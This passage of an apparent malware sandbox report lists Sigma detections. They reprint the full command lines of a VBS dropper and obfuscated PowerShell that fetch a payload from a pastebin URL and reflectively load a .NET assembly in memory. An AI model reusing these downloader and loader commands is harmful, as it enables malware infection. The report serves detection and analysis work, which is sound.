'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?
                    Sigma detected: PowerShell Base64 Encoded Invoke Keyword
                    Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Sigma detected: Suspicious Encoded PowerShell Command Line
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Sigma detected: Suspicious Invoke-WebRequest Execution
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D?
                    Sigma detected: Suspicious PowerShell Encoded Command Patterns
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 980, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, ProcessId: 5480, ProcessName: powershell.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 980, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs", ProcessId: 5480, ProcessName: wscript.exe
                    Sigma detected: PowerShell Web Download
